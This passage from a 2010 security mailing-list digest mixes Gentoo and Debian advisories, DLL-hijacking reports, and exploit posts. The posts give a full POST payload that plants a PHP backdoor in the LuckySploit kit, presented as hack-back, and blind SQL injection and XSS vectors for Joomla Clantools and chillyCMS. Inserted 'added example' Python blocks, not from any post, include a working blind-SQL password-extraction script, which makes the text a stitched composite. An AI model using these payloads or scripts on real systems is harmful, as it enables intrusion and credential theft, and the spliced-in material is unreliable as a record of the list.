* E-mail for proposal submissions: rodrigo *noSPAM* kernelhacking
*dot* com *

Make sure to provide along with your submission the following details:

* Speaker name or handle, address, e-mail, phone number and general
contact information
* A brief but informative description about your talk
* Short biography of the presenter, including organization, company
and affiliations
* Estimated time-length of presentation
* General topic of the speech (e.g. network security, secure
programming, computer forensics, etc.)
* Any other technical requirements for your lecture
* Whether you need visa to enter Brazil or not

Speakers will be allocated 50 minutes of presentation time, although, if
needed, we can extend the presentation length if requested in a

[ GLSA 201009-03 ] sudo: Privilege Escalation

2010-09-07 Thread Alex Legler
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory   GLSA 201009-03
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

  Severity: High
     Title: sudo: Privilege Escalation
      Date: September 07, 2010
      Bugs: #322517, #335381
        ID: 201009-03

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis
========

The secure path feature and group handling in sudo allow local
attackers to escalate privileges.

Background
==========

sudo allows a system administrator to give users the ability to run
commands as other users.

Affected packages
=================

---
 Package /Vulnerable/   Unaffected
---
  1  app-admin/sudo  < 1.7.4_p3-r1  >= 1.7.4_p3-r1

Description
===========

Multiple vulnerabilities have been reported in sudo:

* Evan Broder and Anders Kaseorg of Ksplice, Inc. reported that the
  sudo 'secure path' feature does not properly handle multiple PATH
  variables (CVE-2010-1646).

* Markus Wuethrich of Swiss Post reported that sudo fails to restrict
  access when using Runas groups and the group (-g) command line option
  (CVE-2010-2956).

Impact
======

A local attacker could exploit these vulnerabilities to gain the
ability to run certain commands with the privileges of other users,
including root, depending on the configuration.

Workaround
==========

There is no known workaround at this time.

Resolution
==========

All sudo users should upgrade to the latest version:

# emerge --sync
# emerge --ask --oneshot --verbose ">=app-admin/sudo-1.7.4_p3-r1"

References
==========

  [ 1 ] CVE-2010-1646
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1646
  [ 2 ] CVE-2010-2956
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-2956

Availability
============

This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:

  http://security.gentoo.org/glsa/glsa-201009-03.xml

Concerns?
=========

Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users machines is of utmost
importance to us. Any security concerns should be addressed to
secur...@gentoo.org or alternatively, you may file a bug at
https://bugs.gentoo.org.

License
=======

Copyright 2010 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).

The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/2.5
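USN-983-1 earlier on this page notes that CVE-2010-2956 only applies when sudoers lets a user run a program as a group the user is not a member of, and this GLSA lists the same bug. As an added example (not from either advisory and not sudo's own code), the Python below parses a simplified sudoers grammar and lists the rules whose Runas_Spec carries a group list, which is the set an administrator would review on a host still running a vulnerable sudo. The grammar is an assumption that covers plain user specifications only: aliases, #include lines, Defaults and backslash continuation lines are skipped rather than parsed, and the sample sudoers text is constructed.

```python
import re

# Simplified sudoers user-specification grammar (assumed, not sudo's parser):
#   who  host = (runas_users [: runas_groups]) [TAG:] commands
# Alias definitions, Defaults, #include and continuation lines are skipped.
RULE = re.compile(
    r"^(?P<who>\S+)\s+(?P<host>\S+)\s*=\s*"
    r"(?:\((?P<runas>[^)]*)\))?\s*(?P<cmds>.+)$"
)
SKIP_KEYWORDS = {"Defaults", "User_Alias", "Runas_Alias", "Host_Alias", "Cmnd_Alias"}


def _split_list(text):
    return [item.strip() for item in text.split(",") if item.strip()]


def parse_rule(line):
    """Parse one sudoers line; returns None for blanks, comments and the
    line kinds this simplified parser does not handle."""
    line = line.split("#", 1)[0].strip()
    if not line or line.split()[0] in SKIP_KEYWORDS:
        return None
    match = RULE.match(line)
    if not match:
        return None
    runas_users, runas_groups = [], []
    if match.group("runas") is not None:
        users_part, _, groups_part = match.group("runas").partition(":")
        runas_users = _split_list(users_part)
        runas_groups = _split_list(groups_part)
    return {
        "who": match.group("who"),
        "host": match.group("host"),
        "runas_users": runas_users,
        "runas_groups": runas_groups,
        "commands": match.group("cmds").strip(),
    }


def rules_with_runas_groups(sudoers_text):
    """Rules whose Runas_Spec names a group list, i.e. rules that allow the
    invoker to pass -g.  USN-983-1 states CVE-2010-2956 needs such a rule,
    so on an unpatched sudo these are the entries to review."""
    rules = (parse_rule(line) for line in sudoers_text.splitlines())
    return [rule for rule in rules if rule and rule["runas_groups"]]


# Constructed sample sudoers content, not taken from any real system.
SAMPLE_SUDOERS = """\
Defaults    env_reset
User_Alias  ADMINS = alice, bob
root        ALL = (ALL) ALL
alice       ALL = (root : staff) /usr/local/bin/rotate-logs
bob         ALL = (www-data) /usr/bin/wp      # no group part
carol       ALL = (ALL : ALL) NOPASSWD: /usr/bin/apt-get
"""

if __name__ == "__main__":
    for rule in rules_with_runas_groups(SAMPLE_SUDOERS):
        print(rule["who"], "may run", rule["commands"],
              "as group(s)", ",".join(rule["runas_groups"]))
```

A rule like the "(ALL : ALL)" entry above is the broadest case: it permits any -g value, so it is the first to check. On a patched sudo the group list is enforced as intended and these rules need no change; the point of the listing is to know where the exposure was while the upgrade in the Resolution section is rolled out.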




nmap <= 5.21 is vulnerable to Windows DLL Hijacking Vulnerability.

2010-09-07 Thread nikhil_uitrgpv
1. Overview
nmap <= 5.21 is vulnerable to Windows DLL Hijacking Vulnerability. 

2. Vulnerability Description
nmap passes insufficiently qualified path for the dll "airpcap.dll" while 
opening a file using nmap

Timeline
27-08-2010 - Discovered Vulnerability
31-08-2010 - Disclosed at nmap-dev mailing list
04-09-2010 - Response and fix from developers
05-09-2010 - Disclosure


3. Exploitability
A file extension needs to be registered with nmap to exploit the vulnerability 
and a crafted file needs to be opened from a network share. Currently nmap is 
not registered with any filename so users are not at risk by default.

4. Versions Affected
nmap 5.21 and lower.

5. POC/Exploit
Done with Webdav hijack module of Metasploit.

6. Impact
Remote Code Execution in context of nmap process.

7. References
http://seclists.org/nmap-dev/2010/q3/632

8. Solution
Fixed in latest development release.
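The "insufficiently qualified path" in the post above means the DLL name is passed without a directory, so Windows walks its search order and the current directory (the share the document was opened from) is consulted before PATH. The Python below is an added model of that documented search order; it is not nmap's code and does not claim to be its fix. All paths are hypothetical and constructed, and the block shows why a fully qualified name fails cleanly in the same situation where the bare name picks up the planted copy.

```python
import ntpath

# Windows' documented search order for an unqualified LoadLibrary name with
# SafeDllSearchMode on (the default since XP SP2); with it off, the current
# directory moves up to second place.  Modelled from Microsoft's
# "Dynamic-Link Library Search Order" documentation, not from nmap's code.
def search_order(app_dir, system_dirs, cwd, path_dirs, safe_mode=True):
    if safe_mode:
        return [app_dir, *system_dirs, cwd, *path_dirs]
    return [app_dir, cwd, *system_dirs, *path_dirs]


def resolve_dll(name, app_dir, system_dirs, cwd, path_dirs, present, safe_mode=True):
    """Return the path that would be loaded for `name`, or None.  `present`
    is the set of files that exist; comparison is case-insensitive as on
    NTFS.  A fully qualified name skips the search entirely."""
    existing = {p.lower(): p for p in present}
    if ntpath.isabs(name):
        return existing.get(name.lower())
    for directory in search_order(app_dir, system_dirs, cwd, path_dirs, safe_mode):
        candidate = ntpath.join(directory, name)
        if candidate.lower() in existing:
            return existing[candidate.lower()]
    return None


# Constructed scenario with hypothetical paths: the application directory
# has no airpcap.dll (the optional AirPcap driver is not installed), and a
# document opened from a network share makes the share the current directory.
APP_DIR = r"C:\Program Files\Nmap"
SYSTEM_DIRS = [r"C:\Windows\System32", r"C:\Windows\System", r"C:\Windows"]
SHARE = r"\\fileserver\docs"
PATH_DIRS = [r"C:\Windows\System32", r"C:\Windows"]
PRESENT = {
    r"C:\Program Files\Nmap\nmap.exe",
    r"C:\Windows\System32\kernel32.dll",
    r"\\fileserver\docs\scan.xml",
    r"\\fileserver\docs\airpcap.dll",   # planted beside the document
}


def loaded_from_share():
    """The unqualified name reaches the current directory and picks up the
    planted copy, which is the hijack the post describes."""
    return resolve_dll("airpcap.dll", APP_DIR, SYSTEM_DIRS, SHARE, PATH_DIRS, PRESENT)


def loaded_with_qualified_name():
    """Loading by full path next to the executable never consults the
    current directory: the call simply fails when the DLL is absent."""
    return resolve_dll(ntpath.join(APP_DIR, "airpcap.dll"),
                       APP_DIR, SYSTEM_DIRS, SHARE, PATH_DIRS, PRESENT)


if __name__ == "__main__":
    print("bare name resolves to:", loaded_from_share())
    print("qualified name resolves to:", loaded_with_qualified_name())
```

The exposure condition in the post's section 3 maps directly onto the model: a registered file type is what makes the share the current directory, and an optional DLL that is absent from the application and system directories is what lets the search reach that far. Either loading by full path or removing the current directory from the search (SetDllDirectory("") on Windows) closes the gap; the model only shows the first.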


[TEHTRI-Security Training + 0days] "Hunting Web Attackers" at HITBSecConf

2010-09-07 Thread Laurent OUDOT at TEHTRI-Security


Gents,

We wanted to let you know that TEHTRI-Security will release many 0days 
and offensive technologies during a new training called :


- "Hunting Web Attackers"

It will be proposed during HackInTheBox SecConf Malaysia 2010 in 
October, in Kuala Lumpur.


The 0days will be disclosed under a NDA (for students only) and will 
help at fighting back web attackers, as we already explained in the past 
in China and in Singapore (SyScan).


As a teaser, this email contains one of our remote 0day exploits. We 
also found 0days against Zeus, Eleonore, CrimePack, etc.

Our self-defense cyber-weapons will be disclosed during this training.

-- BEGIN Security Advisory --

Vuln : TEHTRI-SA-2010-018
Tool : LuckySploit Exploit Pack
Title: Remote execution in LuckySploit

LuckySploit is a tool used by attackers to penetrate companies or 
personal computers by abusing client-side vulnerabilities. This malware 
exploitation kit is full of anti Microsoft technologies.


By auditing this Malware, TEHTRI-Security has found a pre-auth remote 
exploit in the file /mod/to.php


By sending a specially crafted HTTP packet with a POST argument, it's 
possible to simulate a configuration modification, and to inject PHP 
code that will be able to be executed after.


Here is an example, where we modify the remote file "7.php" by adding 
our own PHP code inside it (PoC anti kiddies: phpinfo() added).


POST sent to
http://target/luckysploit/mod/to.php?mod=thread_optn&id=../../tconf/7

With arguments :
z=1&exp_pre_config=2&advanced_unik=0&referer_not_empty=0&JS_MODE=0&unquie_type=0&unquie_time=1000%3Bphpinfo%28%29%3Bexit%28%29%3B%3F%3Eaa&stat_packtime=10&country_allow_list=&referer_only=&traff_back_url=&gzip_status=1&gzip_status2=1&ip2cos=1&system_status=1&referer_status=1&puniqstatus=1&puniqblock=0

Then you can access your new remote backdoor here :
http://target/luckysploit/tconf/7.php

This exploit is provided by TEHTRI-Security as a technical proof to show 
that defenders who are under attack, might be able to strike back 
against a group of evil intruders trying to commit cyber crimes against 
them. But this should not be used out of legal field.


This might help at getting the identities of attackers, or at hacking 
their workstations, or at destroying their tools and infrastructures 
(anti-cyber-war & anti-cyber-spy technologies).


-- END Security Advisory --


If you want to be sure to have your seat for this outstanding offensive 
training, please do register as soon as possible (Technical Training 
Track3 / TT3 - Hunting Web Attackers, 11-12 October ) :


http://conference.hackinthebox.org/hitbsecconf2010kul/?page_id=274


See you soon at the awesome international conference HITBSecConf 
Malaysia 2010,


Laurent OUDOT, CEO & Founder TEHTRI-Security
 http://www.tehtri-security.com/


* References:
- BBC   => http://www.bbc.co.uk/news/10349001
- Zdnet => 
http://www.zdnet.com/blog/security/researchers-find-12-zero-day-flaws-targeting-5-web-malware-exploitation-kits/6752

- Btraq => http://seclists.org/bugtraq/2010/Jun/178
- HITB  => http://conference.hackinthebox.org/hitbsecconf2010kul/
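
Added example (not TEHTRI-Security's code and not the kit's own source): the 
page does not show mod/to.php, so the model below assumes that thread_optn 
rewrites tconf/<id>.php by emitting each POSTed option as a bare 
"$name = value;" line and trusts the id parameter as a file name. Under that 
assumption the request quoted above produces the backdoor the advisory 
describes; the hardened writer beside it rejects both the traversal in id 
and the non-numeric unquie_time value. The URL and body are the ones posted; 
the field typing (STRING_FIELDS) is an assumption.

```python
"""Why the posted unquie_time value ends up as executable PHP.

Added example, not TEHTRI-Security's or the kit's code. Assumed (the page
does not show to.php): thread_optn writes every POSTed option into
tconf/<id>.php as "$name = value;" and uses id as a file name unchecked.
"""
import re
from urllib.parse import parse_qsl, urlparse

# URL and body copied verbatim from the advisory.
ADVISORY_URL = "http://target/luckysploit/mod/to.php?mod=thread_optn&id=../../tconf/7"
ADVISORY_BODY = (
    "z=1&exp_pre_config=2&advanced_unik=0&referer_not_empty=0&JS_MODE=0"
    "&unquie_type=0&unquie_time=1000%3Bphpinfo%28%29%3Bexit%28%29%3B%3F%3Eaa"
    "&stat_packtime=10&country_allow_list=&referer_only=&traff_back_url="
    "&gzip_status=1&gzip_status2=1&ip2cos=1&system_status=1&referer_status=1"
    "&puniqstatus=1&puniqblock=0"
)

# Assumed field types: the list/URL options are strings, everything else a number.
STRING_FIELDS = {"country_allow_list", "referer_only", "traff_back_url"}


def decode_request(url, body):
    """Split the request into query parameters and percent-decoded POST fields."""
    query = dict(parse_qsl(urlparse(url).query, keep_blank_values=True))
    fields = dict(parse_qsl(body, keep_blank_values=True))
    return query, fields


def naive_config(fields):
    """Assumed vulnerable writer: each value is dropped into PHP source as-is.

    With the advisory's body this emits
        $unquie_time = 1000;phpinfo();exit();?>aa;
    PHP runs phpinfo() and exit(); the trailing ?> leaves PHP mode, so the
    leftover "aa;" and the rest of the file never raise a parse error.
    """
    lines = ["<?php"]
    for name, value in fields.items():
        lines.append(f"${name} = {value};")
    lines.append("?>")
    return "\n".join(lines)


def valid_id(config_id):
    """Only a plain numeric id may pick a file under tconf/; '../' is rejected."""
    return re.fullmatch(r"[0-9]{1,6}", config_id) is not None


def php_string(value):
    """PHP single-quoted literal: only backslash and the quote need escaping."""
    return "'" + value.replace("\\", "\\\\").replace("'", "\\'") + "'"


def hardened_config(query, fields):
    """Same output format, but the id is validated and every value is typed."""
    config_id = query.get("id", "")
    if not valid_id(config_id):
        raise ValueError(f"rejected config id {config_id!r}")
    lines = ["<?php"]
    for name, value in fields.items():
        if not re.fullmatch(r"[A-Za-z_][A-Za-z0-9_]*", name):
            raise ValueError(f"rejected option name {name!r}")
        if name in STRING_FIELDS:
            lines.append(f"${name} = {php_string(value)};")
        elif re.fullmatch(r"-?[0-9]{1,10}", value):
            lines.append(f"${name} = {int(value)};")
        else:
            raise ValueError(f"{name}: expected an integer, got {value!r}")
    lines.append("?>")
    return "\n".join(lines)


if __name__ == "__main__":
    query, fields = decode_request(ADVISORY_URL, ADVISORY_BODY)
    print(naive_config(fields))            # contains phpinfo();exit();?>
    try:
        hardened_config(query, fields)
    except ValueError as err:
        print("hardened writer:", err)     # rejected config id '../../tconf/7'
```

The two checks are independent: even with a clean id, the unquoted integer 
field is what turns a config edit into code execution, so both the file 
selector and every value need a type, not a blacklist of characters.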


Re: KeePass version 2.12 <= Insecure DLL Hijacking Vulnerability (dwmapi.dll)

2010-09-07 Thread YGN Ethical Hacker Group
The fixed version KeePass 2.13 has been released.

http://keepass.info/news/n100906_2.13.html

But it fails to describe that "DLL Hijacking was fixed".


Joomla Component Clantools version 1.5 Blind SQL Injection Vulnerability

2010-09-07 Thread sattler
# Exploit Title: Joomla Component Clantools version 1.5 Blind SQL Injection 
Vulnerability

# Date: 05.09.2010

# Author: Stephan Sattler // Solidmedia

# Software Link: 
http://joomla-clantools.de/downloads/doc_download/26-clantools-v15-fuer-joomla-15x.html

# Version: 1.5





[ Vulnerability 1 ]



http://www.site.com/joomlapath/index.php?option=com_clantools&squad=1+[Blind SQL]





#Vulnerability was already reported, have a look at 
http://www.joomla-clantools.de to get a patch


[SECURITY] [DSA-2104-1] New quagga packages fix denial of service

2010-09-07 Thread Florian Weimer
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

- 
Debian Security Advisory DSA-2104-1  secur...@debian.org
http://www.debian.org/security/   Florian Weimer
September 06, 2010                      http://www.debian.org/security/faq
- 

Package: quagga
Vulnerability  : several
Problem type   : remote
Debian-specific: no
CVE Id(s)  : CVE-2010-2948 CVE-2010-2949
Debian Bug : 594262

Several remote vulnerabilities have been discovered in the BGP
implementation of Quagga, a routing daemon.

The Common Vulnerabilities and Exposures project identifies the
following problems:

CVE-2010-2948
When processing a crafted Route Refresh message received
from a configured, authenticated BGP neighbor, Quagga
may crash, leading to a denial of service.

CVE-2010-2949
When processing certain crafted AS paths, Quagga would crash
with a NULL pointer dereference, leading to a denial of
service.  In some configurations, such crafted AS paths could
be relayed by intermediate BGP routers.

In addition, this update contains a reliability fix:  Quagga will no
longer advertise confederation-related AS paths to non-confederation
peers, and reject unexpected confederation-related AS paths by
resetting the session with the BGP peer which is advertising them.
(Previously, such AS paths would trigger resets of unrelated BGP
sessions.)

For the stable distribution (lenny), these problems have been fixed in
version 0.99.10-1lenny3.

For the unstable distribution (sid) and the testing distribution
(squeeze), these problems have been fixed in version 0.99.17-1.

We recommend that you upgrade your quagga package.

Upgrade instructions
- 

wget url
will fetch the file for you
dpkg -i file.deb
will install the referenced file.

If you are using the apt-get package manager, use the line for
sources.list as given below:

apt-get update
will update the internal database
apt-get upgrade
will install corrected packages

You may use an automated update by adding the resources from the
footer to the proper configuration.


Debian GNU/Linux 5.0 alias lenny
- 

Source archives:

  
http://security.debian.org/pool/updates/main/q/quagga/quagga_0.99.10.orig.tar.gz
Size/MD5 checksum:  2424191 c7a2d92e1c42214afef9b2e1cd4b5d06
  
http://security.debian.org/pool/updates/main/q/quagga/quagga_0.99.10-1lenny3.diff.gz
Size/MD5 checksum:42826 100dbb936b3b0f0d4fb4947bf384d369
  
http://security.debian.org/pool/updates/main/q/quagga/quagga_0.99.10-1lenny3.dsc
Size/MD5 checksum: 1651 f5b9c26538e9d32008ad0256fe4ad0ed

Architecture independent packages:

  
http://security.debian.org/pool/updates/main/q/quagga/quagga-doc_0.99.10-1lenny3_all.deb
Size/MD5 checksum:   661354 f843c6f765a48f7e071a52d3c7834d2f

alpha architecture (DEC Alpha)

  
http://security.debian.org/pool/updates/main/q/quagga/quagga_0.99.10-1lenny3_alpha.deb
Size/MD5 checksum:  1902990 0f85c30d5f719f9c104f5a8977a5d1a0

amd64 architecture (AMD x86_64 (AMD64))

  
http://security.debian.org/pool/updates/main/q/quagga/quagga_0.99.10-1lenny3_amd64.deb
Size/MD5 checksum:  1749952 89a53689c4daf3f0695ea2c21aa93254

arm architecture (ARM)

  
http://security.debian.org/pool/updates/main/q/quagga/quagga_0.99.10-1lenny3_arm.deb
Size/MD5 checksum:  1449792 3c53e06e4d27ef8cf391533824668b19

armel architecture (ARM EABI)

  
http://security.debian.org/pool/updates/main/q/quagga/quagga_0.99.10-1lenny3_armel.deb
Size/MD5 checksum:  1457202 e52ae364e20ff137c5e0e5f75bfc1ec1

hppa architecture (HP PA RISC)

  
http://security.debian.org/pool/updates/main/q/quagga/quagga_0.99.10-1lenny3_hppa.deb
Size/MD5 checksum:  1683924 c8172ed22b010569949977f407c282b6

i386 architecture (Intel ia32)

  
http://security.debian.org/pool/updates/main/q/quagga/quagga_0.99.10-1lenny3_i386.deb
Size/MD5 checksum:  1608678 e7b5fbd36e4466cdecaca46f1f96642b

ia64 architecture (Intel ia64)

  
http://security.debian.org/pool/updates/main/q/quagga/quagga_0.99.10-1lenny3_ia64.deb
Size/MD5 checksum:  2256144 75ebe4e12a3e22ef79e5e3dab2d457bf

mips architecture (MIPS (Big Endian))

  
http://security.debian.org/pool/updates/main/q/quagga/quagga_0.99.10-1lenny3_mips.deb
Size/MD5 checksum:  1605990 f33ef3d9b31f0da900aba6a20bdd188d

mipsel architecture (MIPS (Little Endian))

  
http://security.debian.org/pool/updates/main/q/quagga/quagga_0.99.10-1lenny3_mipsel.deb
Size/MD5 checksum:  1601240 68ff751ff9c022cc06db8d0d66895a6e

powerpc architecture (PowerPC)

  
http://security.debian.org/pool/updates/main/q/quagga/quagga_0.99.10-1lenny3_powerpc.deb
Size/MD5 checksum:  1717802 931505a31bdcc1a7732a9a2e9f295a01

s390 architecture (IBM S/390)

  
http://security.debi

Joomla Component Clantools version 1.2.3 Multiple Blind SQL Injection Vulnerabilities

2010-09-07 Thread sattler
# Exploit Title: Joomla Component Clantools version 1.2.3 Multiple Blind SQL 
Injection Vulnerabilities

# Date: 05.09.2010

# Author: Stephan Sattler // Solidmedia

# Software Link: 
http://www.joomla-clantools.de/downloads/doc_download/7-clantools-123.html

# Version: 1.2.3





[ Vulnerability 1 ]



http://www.site.com/joomlapath/index.php?option=com_clantools&squad=1+[Blind SQL]



[ Vulnerability 2 ]



http://www.site.com/joomlapath/index.php?option=com_clantools&task=clanwar&showgame=1+[Blind SQL]&Itemid=999



#Vulnerability was already reported, have a look at 
http://www.joomla-clantools.de to get a patch


chillyCMS Multiple Vulnerabilities

2010-09-07 Thread admin

##www.BugReport.ir
#
#AmnPardaz Security Research Team
#
# Title:chillyCMS Multiple Vulnerabilities
# Vendor:   http://frozenpepper.de/
# Vulnerable Version:   1.1.3 (Latest version till now)
# Exploitation: Remote with browser
# Fix:  N/A
###


- Description:


chillyCMS is a Content Management System. Its main features are: easily 
edit your content in a WYSIWYG editor, manage your users in different 
groups with different rights, upload single files or whole zip archives, 
insert your pictures into the content by drag and drop, one click backup 
with integrated installer, extend your cms with various modules, see which 
articles are most popular in the statistics.




- Vulnerability:


+--> SQL Injection
	The username, in the login form, is one-parenthesis single-quoted 
	injectable. For details check the PoC section.

+--> Reflective XSS
	Whenever login fails, the username is printed without sanitizing 
	on the main page. This could be used for executing any JavaScript code.


- Exploits/PoCs:


+--> Exploiting The (MySQL) SQL Injection Vulnerability:
	Simply go to the login page at 
	'victim.com/chillyCMS/core/show.site.php' and use the following 
	vector for injecting arbitrary queries:
	') or $THE_QUERY or 1=('
	For example you may use the following vector for extracting the pw 
	field (for password) of the admin user:
	admin')and substr(pw,I,1)=('C
	replacing I with the index of the character in a loop and C with 
	different characters. If the query result is true, the username will 
	be accepted and the wrong-password error will be shown. If the query 
	result is false, the username will be rejected and the wrong-username 
	error will be shown, allowing blind SQL injection to be performed.

+--> Exploiting The Reflective XSS Vulnerability:
	Use the following sample vector in the username field of the login 
	page (or any other valid JavaScript code) => 
	username: <script>alert('XSS')</script>


- Solution:


White-list the input parameters before using them in the SQL queries, 
removing any ', \, ( characters, or more simply restrict the parameters' 
length to a small length.


- Credit:

AmnPardaz Security Research & Penetration Testing Group
Contact: admin[4t}bugreport{d0t]ir
www.BugReport.ir
www.AmnPardaz.com
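
The boolean-blind loop the chillyCMS post describes (and, with a numeric 
"1 and <expr>" prefix instead of the quoted one, the Clantools squad and 
showgame parameters above), carried through as an added example. This is 
not chillyCMS's or the advisory's code: the target is a constructed 
Python/sqlite3 stand-in for the behaviour described, with the username 
checked first and distinct "wrong username" / "wrong password" responses. 
Payloads keep the posted shape, admin') and <expr>=('<value>, but compare 
hex(substr(pw,I,1)) rather than the raw character, so a quote inside the 
password and a case-insensitive collation cannot skew the oracle, and a 
binary search on the hex value replaces trying every character. The 
parameterised safe_login is the fix a practitioner would apply instead of 
stripping characters.

```python
"""Boolean-blind extraction against a stand-in for the chillyCMS login.

Added example, not chillyCMS's or the advisory's code. The database and
login below are constructed to reproduce the behaviour the post describes.
"""
import sqlite3


def make_app(admin_pw):
    """Constructed target: one admin user with the given password."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE users (username TEXT, pw TEXT)")
    con.execute("INSERT INTO users VALUES ('admin', ?)", (admin_pw,))
    return con


def vulnerable_login(con, username, password):
    # Assumed query shape, matching the "one-parenthesis single-quoted" note.
    sql = f"SELECT pw FROM users WHERE (username='{username}')"
    rows = con.execute(sql).fetchall()
    if not rows:
        return "wrong username"
    if rows[0][0] != password:
        return "wrong password"
    return "logged in"


def safe_login(con, username, password):
    """Parameterised form: the payload is just a username that does not exist."""
    rows = con.execute("SELECT pw FROM users WHERE (username=?)", (username,)).fetchall()
    if not rows:
        return "wrong username"
    if rows[0][0] != password:
        return "wrong password"
    return "logged in"


class Oracle:
    """One 'request' per call; True when the injected condition held."""

    def __init__(self, con):
        self.con = con
        self.requests = 0

    def __call__(self, username_payload):
        self.requests += 1
        return vulnerable_login(self.con, username_payload, "x") == "wrong password"


def extract_pw(oracle, user="admin", max_len=64):
    """Recover users.pw for `user`, assuming printable ASCII (0x20-0x7E).

    hex() of one character is a two-digit uppercase hex string, so '>' on it
    is a byte-order comparison in both SQLite and MySQL, and hex('') is ''
    once the position runs past the end of the string.
    """
    recovered = []
    for pos in range(1, max_len + 1):
        if oracle(f"{user}') and hex(substr(pw,{pos},1))=('"):
            break                                   # past the last character
        lo, hi = 0x20, 0x7E
        while lo < hi:                              # about 7 requests per byte
            mid = (lo + hi) // 2
            if oracle(f"{user}') and hex(substr(pw,{pos},1))>('{mid:02X}"):
                lo = mid + 1
            else:
                hi = mid
        recovered.append(chr(lo))
    return "".join(recovered)


if __name__ == "__main__":
    oracle = Oracle(make_app("s3cr3t!P@ss"))
    print(extract_pw(oracle), "in", oracle.requests, "requests")
```

Every payload closes the application's own parenthesis and quote and lets 
the application's trailing ') close the literal it opened, which is why the 
injected expression always ends in =(' or >(' with no closing quote of its 
own.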



Microsoft Internet explorer 8 DLL Hijacking (IESHIMS.DLL)

2010-09-07 Thread YGN Ethical Hacker Group
I found this Microsoft Internet explorer 8 DLL Hijacking at Inject0r db

http://inj3ct0r.com/exploits/13898

This one is a similar variant of IE 7

http://www.exploit-db.com/exploits/2929/

It can be triggered only if attackers can put an IESHIMS.DLL file in the
user's desktop.

However, there are some supporting factors that make this exploit successful,
such as when the user's default download location is the Desktop.

Ref:
http://aviv.raffon.net/2008/05/31/SafariPwnsInternetExplorer.aspx